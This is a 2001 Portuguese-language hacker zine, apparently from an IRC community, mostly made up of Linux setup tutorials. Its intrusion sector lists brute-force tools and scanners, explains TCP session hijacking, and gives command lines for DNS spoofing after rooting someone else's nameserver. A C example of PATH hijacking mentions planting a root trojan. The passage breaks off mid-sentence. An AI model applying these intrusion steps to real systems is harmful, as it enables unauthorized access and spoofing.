o..................................................................o
.ZZZZZZZZZZ  ..  NNNn    nNN EEEEEEE   sSSSSSS  bb        rrrrrrrr .
.ZzZ   ZZ      NN NN    NN EEeeeee  sSSS  sSs bb         rr   rr .
.Zz   ZZ     ii  NN  NN   NN EE       sSS       bbB        rrrrrrr .
.    ZZ      ii  NN   NN  NN EEeE       sSS     bbbbbbbbb  rrrr    .
.   ZZ   zZ  ii  NN    NN NN EE           sSS   bb   Bbbb  rr rr   .
.  ZZ   ZzZ  ii  NN     NNNN EEeeeee SSs  sSSS  bbB   bbb  rr  rr  .
.ZZZZZZZZZz iiii NNn     nNN EEEEEEE  sSSSSSs   bbbbbbbbb rrr   rr .
o..................................................................o
                                                          

.:x| Zine de Seguranca         |x:.
.:x| Edicao 02                 |x:.
.:x| Data: 10/02/2001          |x:.
.:x| #ZiNESbR - Rede BrasIRC   |x:.
.:x| http://zinesbr.hpg.com.br |x:.
.:x| zinesbr@ieg.com.br        |x:.

x Melhor visualizado no WordPad do Windows ou no VI do Linux  x
x Todo conteudo deste ZiNE sao para fim educativo             x
x Nao nos responsabilizamos por usos indevidos                x   
                                 _________   ___  
                                |         | |   | 
                                | ZiNESbr |.|hpG| 
                                | @#!?.* | |===| 
                                |_________| |___| 
                                     ||           
                                .----------.  _/  
                                |__________| (_)  
                          ..........................
_____________________________________________________________________
'''''''''''''''''''''''''''''''''ZinesBr'''''''''''''''''''''''''''''
      [SETORES]#                                [AUTORES]$    
   
<<[00][ Introducao	                       ][  GoToxY  ][00]>>    
<<[01][ Curso de Linux - Parte 2               ][  Gotoxy  ][01]>>
<<[02][ Tire suas duvidas                      ][  Gotoxy  ][02]>> 
<<[03][ Invadindo um sistema - Parte 2         ][  Gotoxy  ][03]>>
<<[04][ Acessando a Internet pelo Linux        ][  Gotoxy  ][04]>>
<<[05][ Codando Corretamente em C no Linux     ][  Gotoxy  ][05]>>
<<[06][ Como fucar ?                           ][  Gotoxy  ][06]>>
<<[07][ Protegendo seu sistema - Parte 2       ][  Gotoxy  ][07]>>  
<<[08][ Named bug                              ][  Gotoxy  ][08]>>
<<[09][ Backdoors                              ][  Gotoxy  ][09]              
<<[10][ Ultimas palavras                       ][  Gotoxy  ][10]>>
______________________________________________________________________
''''''''''''''''''''''''''''''''''''''ZinesBr'''''''''''''''''''''''''

   

SETOR [00]
==[ Introducao ]==
==[ Por Gotoxy ]==

	E ae. Estamos na nossa edicao 02 . Recebemo muitos emails de leitores 
do zinesbr,agradeco a todos! Ainda nao tivemos tempo para responder. Mas, 
logo teremos. 	
	Estava lendo uns emails e vi algumas pessoas pedindo para entrar para o 
zinesbr. E eu jah vou respondendo, nao somos um cla. Eu, Gotoxy, administro 
o zinesbr e tenho a responsabilidade de tomar conta de tudo sobre a revista.
O Kbytes administra o site do zinesbr,etc.Jah estamos administrando muito bem 
os zines e portanto nao precisamos,por enquanto,de mais um fazendo uma funcao 
aqui. Entao, nao adianta mandar emails como estes pois nao vamos responder. 	
	Outra coisa, emails pedindo informacoes como "como faco para invadir a 
microsoft" serao ignoradas. Nao seja imbecil perguntando essas baboseiras!
porque? Porque nao estamos aqui para ensinar a cada um de vcs o que querem 
aprender.soh estamos lhes passando informacoes educativas para conhecimento 
e nao informacoes p/ torna-los garotos rebeldes ensinando-lhes coisas desse 
tipo. Muitas pessoas ignoram a --Introducao-- ,hehehe, Pois,com certeza eh 
a parte mais chata,porem,quando eu lia(e ainda leio) zines eu gostava de ler 
a introducao. Soh coloco introducao para enfeitar mesmo, porem, ha pessoas q 
gostam de ler. Portanto, alem de colocar isso para enfeitar,coloco isso para 
as peoples que  gostam de ler. E, entao eh soh isso mesmo.Caso leu isso tudo,
obrigado. Caso  contrario, obrigado tb. Chega de falar baboseiras... e 
Boa leitura!!
     

                                                   Gotoxy
                                                   gotoxy@linuxbr.com.br
.:x| ------------------------------------------------------------------- |x:.










SETOR [01]
==[ Curso de Linux - Parte 2 ]==
==[ Por Gotoxy               ]==

InDiCe:
     0. Introducao
     1. Configurando o modem
     2. Memoria Ram maior que 64M
     3. Comandos basicos


0.Introducao
Essa eh a segunda parte do nosso Curso de Linux.Espero que com ele eu 
esteja ajudando aos usuarios mais leigos no assunto. 

1.Configurando o Modem
Eh o seguinte,muitos ouvem falar na palavra winmodem e nao entende o 
que essa palavra quer dizer e tambem instalam o Linux e nao sabem pq 
nao conseguem conectar atraves dele.Portanto,vou explicar detalhe por
detalhe essas duvidas...

--[ Winmodem ]--
Afinal, o que eh winmodem?? Winmodem, sao aqueles modems que funciona 
no SO windows. Atraves dos drivers* que eles "agem" certo.O linux nao 
possui esses drivers, por isso, winmodens nao funciona em linux.

*drivers: a funcao do driver eh fazer o hardware funcionar 
corretamente no sistema.

Alguns fabricantes jah fizeram drivers para seu modens para funcionar 
Linux, vejamos alguns casos:

--[ Winmodem com chipset Lucent ]--

Para utilizar esse winmodem, entre no site www.linmodems.org e faca o 
download do driver linux568.zip

Depois de downloadado, deszipe ele:

# gunzip linux568.zip

Em seguida, edite o arquivo ltinst para configurar,usando qquer editor. 
Quando vc entrar no arquivo, voce tera q configurar a porta em que seu 
modem esta, veja como funciona as portas no Linux:

MSDOS        LINUX
com1          cua0 = /dev/ttyS0
com2          cua1 = /dev/ttyS1
com3          cua2 = /dev/ttyS2
com4          cua3 = /dev/ttyS3

Entao,coloque a porta em q ser modem esta e depois saia do arquivo 
e salve as alteracoes... em seguida, digite na shell:

#./ltinst

E assim o driver serah instalado!

--[ Modems PCTEL no linux ]--

Pegue o driver no seguinte site:
   www.pcchips.com.tw/driver/linux/MODEM/PCTEL.ZIP

Descompacte assim:

# unzip pctel.zip

E depois entre no dir /etc/modules e compile o driver com o comando 
make e dps vc deve copiar o arkivo /lib/pctel.o para o diretorio 
/lib/modules/(versao do kernel)/net

Acompanhe o exemplo:

# cp ../../lib/pctel.o /lib/modules/2.2.17/net

E depois:

# insmod pctel.o 
# ln /dev/ttyS15 /dev/modem
# mknod /dev/ttyS15 c 62 79

Para voce carregar o modulo sempre que o linux for iniciado, basta 
digitar:

# echo "modprobe pctel.o" >> /etc/rc.d/rc.modules


2.Memoria Ram maior que 64M

Para fazer seu linux reconhecer mais q 64 mb de ram sem depender 
da bios faca o seguinte:

    [localhost]# vi /etc/lilo.conf

Aperte a tecla [INSERT] e depois coloque a seguinte linha no
lilo.conf:
    
    append="mem=128M"

Para o caso de 128MB de memoria RAM 

Em seguida, saia do editor VI apertando a tecla [ESC] e depois 
digitando: wq! e em seguida apertando [ENTER].

Obs: A sintaxe wq! eh para sair do vi salvando as alteracoes.

Quando sair do editor VI, digite:

     [locahlost]# /sbin/lilo

Reinicie a makina... 
       [locahlost]# reboot


3.Comandos basicos

Abaixo vou colocar os comandos mais utilizados no linux. Lembre-se: 
esses comandos sao o basico mesmo,se quiser se aprofundar recomendo 
voce a pegar uma apostila. 



mkdir             Este comando eh para se criar um diretorio
                  Sintaxe: mkdir <nome da pasta>

ls                Lista os arquivos 
                  Sintaxe: ls -la

cd                Descer/entrar diretorio
                  Sintaxe: 
                  Para descer um diretorio: cd .. 
                  Para entrar em um diretorio: cd <nome da pasta>

halt              Desliga o computador
                  Sintaxe: halt

reboot            Reinicia o computador
                  Sintaxe: reboot

w                 Olha os users q estao logados na makina e tb
                  mostra o q estao fazendo
                  Sintaxe: w

killall           Reinicia os arkivos de configuracao, como: inetd.conf,
                  syslogd.conf, etc.
                  Sintaxe: killall -HUP <arkivo>

cat               Concatea e imprimi arkivos
                  Sintaxe: 
                  Para imiprimir: cat <arkivo>
                  Concateando: cat ola! > <arkivo de saida>
                  Tem mais metodos, como: cat <arkivo> | more
                  [eTc]

cb                Embelezador de C. Muito util para desenvolvedores 
			de programas em UNIX.
			Sintaxr: cb -s velhofonte.c > novofonte.c

gcc/cc            Ambos sao compiladores de C
                  Sintaxe: gcc <nome-do-arkivo>.c -o <nome-do-arkivo> 
                  Ou: cc <nome-do-arkivo>.c -o <nome-do-arkivo> 

cp                Copia um arquivo para outra localizacao.
			Muito usado para duplicar arquivos. Formato geral:
                  Sintaxe: 
                  cp /dir-onde-esta/arquivo1 /dir-para-onde-vai

mv                Usado para renomear nome de arkivos e mudar de lugar.
                  Sintaxe: 
                  Renomeando: mv <nome-antigo> <nome-novo>
                  Mudando de dir: mv /dir-onde-esta/arkivo /dir-p/-onde-vai

cu                Eh o comando que chama UNIX (call UNIX) estabelece
                  uma sessao com outro sistema remoto.

cut               Comando usado para extrair informacoes seleciona-
			das de um arquivo  de  entrada. Opcao -d eh usada 
			para  espefificar  o caracter delimitador, se nao 
			colocar nada ele pega como padrao um unico espaco 
			em branco. Opcao  -f eh usada para indicar  quais 
			campos serao recortados.
			Tipo assim, para  listar todas as IDs de usuarios 
			e seus nomes, o seguinte comando poderia ser usado:
 			cat /etc/passwd | cut -d":" -f1,5       
				       
date              Mostra data e hora do sistema
                  Sintaxe: date

df                Mostra o espaco livre no file system 
                  Sintaxe: df [opcoes]
                  Exemplo: df -a

echo              Mostra na tela um argumento
                  Sintaxe: echo "ola computador" 

find              Localiza um arquivo com caracteristicas especificadas
                  Sintaxe: find / -name <gotoxy> -print
                  Vai procurar desde a raiz todos os arkivos denominado 
                  'gotoxy'

ln                Famoso link. Usado pra criar ligacoes entre arquivos. 
                  Modificar o link eh modificar a origem.
                  Sintaxe: ln -s /home/globo/gotoxy zinesbr
 
		      Linkamos o gotoxy ao arquivo zinesbr
		      Para se desfazer do link usamos o rm ou o unlink.

rpm               Usado para instalar pacotes
                  Sintaxe: rpm -ivh <nome-do-pacote>.rpm

pwd               Esse comando eh usado para mostrar o diretorio corrente
                  Sintaxe: pwd

rm                Este comando eh usado para remover arkivos
                  Sintaxe: rm -f <nome-do-arquivo>

rmdir             Comando utilizado para remover diretorios vazios
		      Sintaxe: rmdir <nome-da-pasta-vazia>

vi                Eh um editor muito bom e ao mesmo tempo eh dificil
                  para iniciantes. 
                  Sintaxe: 
                  Editando um arquivo: vi <arkivo>

ps                Este comando eh responsavel por exibir os processos
                  que estao ativos.
                  Sintaxe: ps [opces] 
                  Exemplo: ps -a

clear             Este comando apenas limpa a tela.
                  Sintaxe: clear

head              Este comando mostra as linhas iniciais de um arquivo
                  texto.
                  Sintaxe: head [opcoes]
                  Exemplo: head arquivo.txt, head -n 20 arquivo.txt

uptime            Este comando mostra o tempo de execucao do sistema
                  desde o computador foi ligado.
                  Sintaxe: uptime

                  
                                                   Gotoxy
                                                   gotoxy@linuxbr.com.br
.:x| ------------------------------------------------------------------- |x:.










SETOR[02]
==[ Tire suas duvidas ]==
==[ Por Gotoxy        ]==


 O QUE EH MACRO ?

Eh uma sequencia de comandos ou pekenos programas utilizados para
automatizar procedimentos.

------------------------------------------------------------------


 O QUE EH API ?

API significa: Application Program Interface. Api sao um conjunto 
de funcoes e sub-rotinas que sao usados para ativar determinados 
dispositivos no programa(software).Por exemplo,quando um programa
executa uma funcao em que o sistema operacional  esta  envolvido, 
geralmente esta fazendo uma chamada para uma API.

------------------------------------------------------------------

 O QUE EH USB ?

USB significa: Universal Serial Bus. O usb eh uma interface para 
receber  a conexao  de dispositivos  no  computador. Uma de suas 
vantagens eh q ele recebe ate 127 conexoes externas, bom demais 
neh?:)

------------------------------------------------------------------

 O QUE EH PING ?

Famoso ping...muitos usam o ping porem nem sabem o que eh..alguns 
acham que eh uma especie de flood e que com ele vc vai derrubar um 
servidor. Explicando: PING quer dizer: Packet Internet Groper. O q 
ele faz? ele eh um simples prog. que testa condicoes de alcancar o 
destino (atraves de um pedido de eco do ICMP) e o tempo  de espera 
por uma resposta. o destino eh um host por exemplo.

------------------------------------------------------------------


 O QUE EH SOCKETS ?
 
Os sockets sao os programas(softwares) responsaveis pela comunicacao 
ou interligacao de outros programas na internet, por exemplo. Quando 
voce se conecta a um servico qualquer tipo(ftp) voce estah usando um 
socket,no caso chama-se a rotina socket() como cliente do teu lado e
do lado do host com servico uma rotina de socket servidor.


------------------------------------------------------------------

 
 O QUE EH MEMORIA VIRTUAL ?

Memoria virtual eh a memoria fornecida pelo sistema operacional para
ampliar o tamanho da memoria principal do computador. uma simulacao
da memoria RAM em disco, o que permite que o espaco de enderecamento
do computador ultrapasse a memoria fisica disponivel.


                                                   Gotoxy
                                                   gotoxy@linuxbr.com.br
.:x| ------------------------------------------------------------------- |x:.










SETOR [03]
==[ Invadindo um sistema - Parte 2 ]==
==[ Por Gotoxy                     ]==

Ol crianas!
    Hoje nos vamos continuar com a nossa segunda parte de como
se invadir um sistema.Caso na primeira etapa (invadindo um sistema
- parte 1) voce nao conseguiu obter root em algum sistema,espero
que dessa voce voce obtenha exito.
    Antigamente,muitos "hackers" utilizam tecnicas como brutal force.
Essa tecnica,consiste em tentar se logar na makina alvo atraves de
tentativas e erros.Basicamente,o metodo eh o seguinte: voce utiliza
uma wordlist* e um pekeno programa que vai a sua wordlist e ir
tentando se logar atraves de login/passwords ateh conseguir um
username/password validos.

Obs: uma wordlist eh um arquivo comum que tem como conteudo
uma quantidade de palavras,letras em geral que vai ser usado
junto ao programa de brutal force para obtencao de logins e
passwords validos.
    
    Para windows, voce pode fazer o download do programa wwwhack.
Ele eh um programa muito bom! Ele, o programa propriamente dito,
jah vem com uma wordlist e tenta ataques de brutal force em varios
servicos, como ftp, pop, web ...
     Para linux, voce pode procurar pelos seguintes programas: 
verify.c  = Brutal Force para POP
arse.c    = Brutal Force para Web

     Voce pode encontrar os programas no seguinte site:
http://packetstorm.securify.com


Analisando uma Rede
###################
                            
      Abaixo vamos ver alguns programas que serao uteis para vc
obter mais informacoes de um servidor:

*    Pegue o programa Nmap pois com ele voce vai saber quais
portas no sistema alvo estao abertas.Com ele tambem eh possivel
obtermos informacoes muito uteis como por exemplo qual sistema
a rede alvo esta utilizando (atraves da tecnica fingerprint), etc.
Voce pode encontra-lo em: 

http://packetstorm.securify.com


*    Pegue o programa Vetescan,que eh um utilitario muito
bom para voce obter informacoes e vulnerabilidades de uma
maquina. Voce pode encontra-lo no endereco abaixo:

http://self-evident.com
     
*     Pegue tambem o programa SATAN,que eh uma ferramenta
muita boa para testar a seguranca de uma rede.Voce pode
obter ele no endereco abaixo:

http://packetstorm.securify.com

*     Voce tambem pode pegar o programa SSCAN2K! Ele eh muito
baum,pois faz uma varredura no sistema! Ele tem a mesma funcao
que o VeteScan: procurar vulnerabilidades em servicos! Pegue-o
em: 

http://packetstorm.securify.com


       Com estes quatros programas citados acima,vc jah poderah
fazer um check-up de uma makina,portanto,nao eh necessario eu
citar mais ferramentas com essa funcao (funcao de obter infos
de uma makina)...

       

Um pouco de Spoof
#################

       A tecnica de spoofing,que muitos ateh hoje nao conseguiram
realiza-la, nao eh um bicho de sete cabecas.Ela consiste em mudar
seu hostname atraves de uma falha no protocolo TCP/IP.Eh possivel
enviar dados a determinada maquina com o remetente falso...
tudo isso, gracas a essa tecnica.Abaixo segue uma simples explicao
de como realizar essa facanha..:)

       Utilize essa tecnica em sua rede local (caso tenha uma) para
voce ver como que eh a coisa.
  
- Requerimentos necessarios
  + Um sniffer (recomendo o 'tcpdump').
  + Uma shell   
  + E esperteza...

Por exemplo, voce utilizando um sniffer (tcpdump por exemplo),voce
percebe que existe uma conexao vindo de 200.200.200.1 para o micro
(computador) 200.200.200.2.A partir disso, voce deve observar como
que anda os numeros sequenciais da conexao.Eh mais ou menos assim:

TCP Packet ID (from_IP.port-to_IP.port):
200.200.200.1.23 - 200.200.200.2.23
SEQ (hex): B8BD767B  ACK (hex) 57E1F2A8
FLAGS: -AP---  Window: 2238
...

obs: Isso acima foi uma amostra do que aparece em um sniffer.
obs2: Repare que os numeros sequencias estao em hexadecimal.
obs3: Os numeros sequencias seguem uma ordem logica.


Portanto,para voce intromissar na conexao,basta mandar um pacote
tcp,"pegando" a conexao e consequentemente passando-se pelo cliente.
Aih voce pergunta? - "Como eu vou mandar um pacote tcp para pegar
a conexao" - Simples meu amigo,basta voce utilizar uma ferramenta
com esses propositos..:) 

       
Praticando o Spoof - DNS SPOOFING
##################################
 
    Para spoofarmos precisamos de r00t no minimo em dois computadores.
Sendo uma delas a sua maquina(computador) e outra um nameserver.Portanto,
primeiramente voce deve rootar um nameserver.
    
* Suponhamos: 

voce.org       -> Sua makina. 
200.0.0.1      -> Seu Internet Protocol (IP).
NS.alvo.com.br -> nameserver q vc tem root (akele q voce rootou :)).
the.best       -> Dominio falso q voce quer ter.

No nameserver NS.alvo.com.br deve ter um sub-dominio indicando q o NS
eh a sua maquina, no caso a 'voce.org':   


kiddah              IN      NS      voce.org.



Na sua maquina (voce.org) rode o jizz com a seguinte sintaxe:

root@voce.org~#: ./jizz <beginhost> <fakenshost> <fakensip> <fakensdom> 
<spoofedip> <spoofedhost>

* 0nde:

<beginhost>   - kiddah.alvo.com.br
<fakenshost>  - voce.org
<fakensip>    - 200.0.0.1
<fakensdom>   - alvo.com.br
<spoofedip>   - 200.0.0.1
<spoofedhost> - the.best

  Portanto, ficaria:

root@voce.org~#: ./jizz kiddah.alvo.com.br voce.org 200.0.0.1 alvo.com.br 
200.0.0.1 the.best

   O que o Jizz fez no nosso caso??? Ele diz que kiddah.alvo.com.br eh um 
nickname para the.best e que esse host tem endereco 127.0.0.1.
   Logo apos, voce precisa fazer o servidor que voce quer entra ter acesso
a essas informacoes.Por exemplo, voce quer acessar o irc.matrix.com.br. O
nameserver da matrix eh NS.matrix.com.br.Entao voce tem que fazer o seguinte:

[root@voce.org]# nslookup -type=soa kiddah.alvo.com.br NS.matrix.com.br

-> Para confirmar se tudo estar certo, digite: 

[root@voce.org]# nslookup the.best NS.matrix.com.br


    Eh isso aih!!
Entendeu agora como a coisa funciona neh? 
    Thanks Cheat Struck!!



Finalizando         
###########

     Caro amigo fucador,espero que tenha aprendido um pouco mais
de hacking.Rootar uma maquina nao eh tao dificil.Basta ter paciencia.
Caso nao encontre formas de invadir uma rede, procure descobrir
vulnerabilidades...Para voce descobrir,precisa fucar,fucar muito.
Nenhuma rede esta 100% segura..,acredite! Saiba que sempre vai ter
um furo no sistema te esperando...basta encontra-lo!!


Aonde buscar ajuda?
###################

Recomento aos mais iniciantes ao hacking, nao buscarem informacoes
em servidores de irc,pois ninguem gosta de ser interropido de suas
conversas para darem atencao a pessoas que perguntam algo como:
"eu tenho o crackjack,gostaria de saber como faco para usa-lo,podem
me ajudar" - o minimo que voce pode ganhar eh um BAN! Ahh,mas tem um
porem,caso o #canal seja relacionado a dar respostas como estas
citadas acima,voce pode receber ajuda.Eu nao negaria a ajuda-los,
pois quero que a comunidade fussadora cresca cada dia mais.Portanto,
aconselho a voce buscar ajuda no nosso canal (#zinesbr - brasIRC)
e ir sempre acompanhando o nosso zine..:)


                                                   Gotoxy
                                                   gotoxy@linuxbr.com.br
.:x| ------------------------------------------------------------------- |x:.










SETOR [04]
==[ Acessando a Internet pelo Linux ]==
==[ Por Gotoxy                      ]==

Quando algumas pessoas migram do Windows para o Linux e nao conseguem
conectar por lah (pelo linux), entram em panico!:) Por isso, venho eu
a escrever este simples txt porem muito util para dar um help a esses
individuos.Antes de voce instalar o Linux, eh recomendavel voce pegar
algumas informacoes sobre o seu modem no Windows.Portanto,siga os pas-
sos abaixo:

- Entre no Painel de Controle
Iniciar \ Configuracoes \ Painel de Controle

- Em seguida, clique duas vezes sobre Modems

Logo, clique em 'Diagnostico' e depois em 'Mais informacoes' e depois
anote a porta em que se encontra o seu modem e anote tambem o irq do
seu modem (interrupcao = irq).

Seguindo os passos citados acima, vamos ter que pegar algo muito 
importante... o ip do dns do seu provedor! Para isso voce vai 
precisar acessar a internet e logo apos acessa-la entre em  
Iniciar \ Executar e digite "winipcfg" (sem aspas).Uma tela
sera aberta e depois disso clique em 'Mais informacoes >>' e
anote o IP que aparece em 'Servidores DNS'.

Obs: Caso voce nao tenha o Windows instalado para pegar essas
informacoes, consulte o manual do seu modem.Caso voce nao tenha
o manual do seu modem, ligue para a loja onde voce comprou seu
modem e peca as informacoes propriamente ditas.

Pronto, agora instale o LiNuX! Depois de instala-do, siga os passos
abaixo:

1) Entre no diretorio /etc
2) Edite o arkivo resolv.conf
3) Acrescente as seguintes linhas nele:

domain ig.com.br          # troque ig.com pelo dominio do seu provedor
nameserver 200.202.193.66 # troque 200.202.193.66 pelo ip do dns do seu 
                          # provedor 

4) Salve e saia.

5) Entre no diretorio /dev e depois voce deve criar um link da
porta do seu modem...

# cd /dev
# ln -sf ttyS1 modem

Obs:
* O nome do link deve ser "modem"
* Troque ttyS1 pela porta em que se encontra seu modem

=== Tabela de portas no Linux ===
MSDOS       LINUX
com1        cua0 = /dev/ttyS0
com2        cua1 = /dev/ttyS1
com3        cua2 = /dev/ttyS2
com4        cua3 = /dev/ttyS3


-------------------------- 
Conectando Atraves do KPPP
-------------------------- 

Entre no modo grafico
[root@localhost]# startx

Abra o KPPP e configure-o (adicionando uma nova conta...)
Qualquer um consegue configurar o KPPP! Portanto nao sera
necessario a explicacao do mesmo. Caso ocorra tudo certo
a conexao, parabens! Caso contrario, vamos seguir os passos
abaixo:

* Caso no KPPP aparece um erro do tipo: "O modem esta ocupado",
voce deve incluir a linha abaixo no arquivo /etc/rc.d/rc.local:
(no final do arquivo)

setserial /dev/ttySX UART 16550A irq X 

Onde: 
/dev/ttySX - Substitua o 'X' pela porta do seu modem. Para mais
informacoes consulte a 'Tabela de Portas no Linux'.
irq X - Substitua X pelo numero do irq do seu modem 
 
Talvez voce tenha que mudar o UART 16550A de acordo com a marca 
de seu modem,acho q para USrobotics PNP esse UART16550A funfara.

Reinicie sua maquina e logo apos, tente se conectar novamente.
Logo apos se conectar, utilize algum recurso para ver se voce 
esteja realmente conectado. Tente acessar uma pagina web, por 
exemplo:

[root@localhost]# lynx http://zinesbr.hpg.com.br

Conseguiu acessa-la? Parabens! Voce esta na internet:)

-----------------------------
Conectando Atraves do Minicom
-----------------------------

Para se conectar atraves do Minicom eh muito simples. Primeiro,
entre no minicom:

[root@localhost]# minicom

Em seguida, digite:

ATDT 15002000 

Obs: Substitua o telefone 15002000 (que eh da IG) pelo telefone
de acesso do seu provedor. Caso sua linha seja pulse, o comando
eh:

ATDP 15002000 

Apos isso, o minicom vai se conectar com o provedor e vai pedir
o username e o password de acesso. Logo depois que voce passar 
os dados para o provedor, voce deve apertar ALT + Q para sair 
do minicom sem desconectar. E para voce estabelecer a conexao
com o servidor, voce deve digitar o comando abaixo:

[root@localhost]# pppd-2.2 /dev/modem 115200 defaultroute.

Obs: o numero 115200 varia com a velocidade, esse numero 115200 
corresponde com o seu modem a 33.600 bps.

Utilize algum recurso para ver se voce esteja realmente conectado.
Tente acessar uma pagina web, por exemplo:

[root@localhost]# lynx http://zinesbr.hpg.com.br

Conseguiu acessa-la? Parabens! Voce esta na internet:)


---------------------------- 
Conectando Atraves do Wvdial 
---------------------------- 

Pegue o programa wvdial no site da linuxall(www.linuxall.org).
Agora basta instalar, para isso, siga os passos abaixo:

* Salve-o no diretorio /root (ou outro dir) e depois execute
os comandos abaixo (como root):

[root@localhost]# tar -zxvf wvdial-1.41.tar.gz
[root@localhost]# cd wvdial-1
[root@localhost]# make
[root@localhost]# make install

* Apos isso, voce deve editar o arquivo /etc/wvdial.conf.Caso
ele nao exista, basta cria-lo:

[root@localhost]# cd /etc
[root@localhost]# vi wvdial.conf

* Como conteudo, coloque:

-------------------------- /etc/wvdial.conf ------------------------- 
[Dialer Defaults]

# O simbolo "#" atras da linha, significa que esta linha esta
# sendo comentada, portanto, ela nao sera interpretada como
# se fosse 'comandos'.

Modem = /dev/ttySX   # troque X pela porta do seu modem, para
                     # mais informacoes, consule a 'Tabela de
                     # portas no Linux'.
Baud = 115200
Init 1 = ATZ
Init 2 = ATQ0 V1 E1 S0=0 &C1 &D2 S11=55 +FCLASS=0

Phone = phone         # troque 'phone' pelo telefone do seu provedor.
Username = seu_login  # troque 'seu_login' pelo seu login
Password = sua_senha  # troque sua_senha pela sua senha

---------------------------------------------------------------------

Para salvar e sair, pressione [ESC] e depois digite dois pontos ":" e
depois digite "wq!" (sem aspas) e aperte [enter] (caso esteja no vi).

* Agora para se conectar, basta digitar no shell: wvdial

[root@localhost]# wvdial

* E depois de alguns minutos (ou segundos), digite na shell ifconfig 
para ver se tudo ocorreu bem:

[root@localhost]# ifconfig

Utilize algum recurso para ver se voce esteja realmente conectado.
Tente acessar uma pagina web, por exemplo:

[root@localhost]# lynx http://zinesbr.hpg.com.br

Conseguiu acessa-la? Parabens! Voce esta na internet:)

Se vc esta tendo problemas em se conectar com a internet com o
seu modem, recomendo voce ligar  para o fabricante e/ou a loja
onde voce comprou seu modem  e perguntar se ele(o modem) eh um
wimmodem.Caso ele seja winmodem, ele nao  funcionara no Linux.  
Winmodem sao modens comuns,porem, soh funciona no Windows. Pq?  
Porque o sistema Linux  nao possui  drivers de  hardwares (com 
algumas excessoes)! Ps:  Drivers  sao  pequenos softwares, que 
fazem o hardware (como por ex. o modem) funcionar corretamente.

                                                   Gotoxy
                                                   gotoxy@linuxbr.com.br
.:x| ------------------------------------------------------------------- |x:.











SETOR [05]
==[ Codando Corretamente em C no Linux ]==
==[ Por Gotoxy                         ]==

 necessrio voc escrever seus programas com o mximo de cautela,
isso porque caso eles sejam escritos de forma incorreta, podem vir 
a causar danos ao seu sistema Linux. Vamos a um exemplo simples:

----------------------------- exemplo.c -----------------------------

#include <stdio.h>
#include <string.h>

main() {
system("clear");  /* Oooops! */
printf("Programa Exemplo.\n");
}

---------------------------------------------------------------------

   Como vocs podem observar, a linha system("clear"); d a este 
programa uma tremenda de uma vulnerabilidade. Porqu? Eu explico:

   Vamos compilar o exemplo.c:

[root@darkstar /tmp]# gcc -o exemplo exemplo.c

   Agora, vamos fazer um outro programa, cujo nome eh clear.c

------------------------------ clear.c ------------------------------

#include <stdio.h>

main(){
printf("Gotoxy!!\n");
}

---------------------------------------------------------------------

   Compile o programa acima:

[gotoxy@darkstar /tmp]$ gcc clear.c -o clear

   Agora, rode o programa exemplo.c

[root@darkstar /tmp]# ./exemplo
Gotoxy!!
[root@darkstar /tmp]#

   Entendeu agora? Isso ocorre por nao setar o path completo de onde
se localiza o programa(no caso o programa clear).Isto pode vir a causar
dor de cabeca ao dono do sistema pelo seguinte motivo: ao invez de eu 
ter feito aquele inofensivo programa (clear.c), eu poderia ter feito
um programa de trojan para eu ter acessos futuros ao sistema alvo com 
acesso r00t! Portanto, sempre que usar comandos como "system" em seus 
programas, lembre-se sempre de colocar o path completo de onde se localiza
o programa que deseja executar. O programa exemplo.c escrito corretamente 
seria:

----------------------------- exemplo.c -----------------------------

#include <stdio.h>
#include <string.h>

main() {
system("/usr/bin/clear"); /* Agora sim!! :) */
printf("Programa Exemplo.\n");
}

---------------------------------------------------------------------

   Portanto lembre-se: sempre coloque o path completo!! Tome cuidado 
tambem com as outras funcoes(), para assim, nao botar em risco o seu 
sistema!

T+ Coderz!

                                                   Gotoxy
                                                   gotoxy@linuxbr.com.br
.:x| ------------------------------------------------------------------- |x:.










SETOR [06]
==[ Como fucar ? ]==
==[ Por Gotoxy   ]==


O ZINESBR esta sendo feito de uma maneira incorreta, pois acho que ele 
est dando  muitas "receitinhas de bolo" e  assim  a comunidade kiddie 
cresce. E eu nao quero isso, alias, ninguem quer..:)  Por  esse motivo, 
recomendo que alem de voces lerem os zines do zinesbr,vcs devem tambem
fucar bastante em sua makina. Quando  eu  me refiro  ao  verbo "fucar", 
muitos nao entendem...fucar eh usar de diferentes  formas um  software, 
buscas de falhas que podem  ser  exploradas. Continuando... entao caro 
leitor,os textos que eu disponho no zine sao apenas para ajudar a voce 
a conhecer outras tecnicas do hacking,porem,voce nao deve ficar apenas 
sabendo o q vc le no zine e sim buscar novas tecnicas - mas como? - eu 
respondo: oras como..fucando ueh..:) Para sempre vc obter exito quando 
for fucar  em algo, eh recomendavel  os  conhecimentos  citados abaixo, 
porem, nao eh recomendavel saber  tudo isso abaixo  para fucar em algo. 
Os conhecimentos para sempre obter exito sao:

+ Conhecimentos em linguagem de baixo e alto nivel
+ Conhecimento em protocolos e rede
+ Conhecimento em Sistemas Operacionais
+ ETC

___________________________________________________
+ Conhecimentos em linguagem de baixo e alto nivel 
---------------------------------------------------
Linguagens de alto nivel:
  + Linguagem C
  + Visual Basic/Delphi
Linguagens de baixo nivel:
  + Assembly  

Voce sendo um expert em c\c++ (programando com sockets, loadable 
kernel module,etc) e sabendo uma linguagem de baixo nivel como
asm (assembly) voce serah um otimo fucador. Pois vc sabendo elas,
voce podera fazer qquer tipo de programa, podera entrar em qquer
sistema por mais segura q seja (caso encontre uma possibilidade
neh?!) e etc... 

Voce sabendo c\c++,assembly,entre outras,jah eh capaz de produzir 
varios programas como os temiveis exploits. Mas  primeiro tem que 
aprender como que funciona antes os ataques de buffer overflows e 
a escrever shellcodes....


____________________________________
+ Conhecimento em protocolos e rede
------------------------------------

Ter  experiencia  com  os  protocolos  (tcp/ip, udp, icmp, etc) eh 
bastante util. Pois como todos sabem eh atraves deles que trocamos 
dados. Sendo assim, voce  acaba descobrindo  falhas por exemplo no 
protocolo tcp e faz um programa  capaz  de  derrubar  um  servidor
rapidinho (melhor q um ddos :)).

Ter experiencia em redes eh importante tambem. Tudo que venha a ser 
de computers eh importante para um fucador,pois algum dia, pode ser 
de muita importancia para ele. Portanto, conhecendo o funcionamento
de uma rede, voce poderah fazer muitas coisas que venham a ser util 
para voce.

_______________________________________
+ Conhecimento em sistemas operacionais
---------------------------------------

Claro que os sistemas operacionais (unix, linux, windows, beos, etc) 
nao podiam ser deixados de ser mencionados no guia de como fucar..:) 
Eh muito  (muito mesmo)  importante  voce  dominar  um  SO  (sistema 
operacional)  pois  eh  atraves dele  que  fucamos  e  exploramos as 
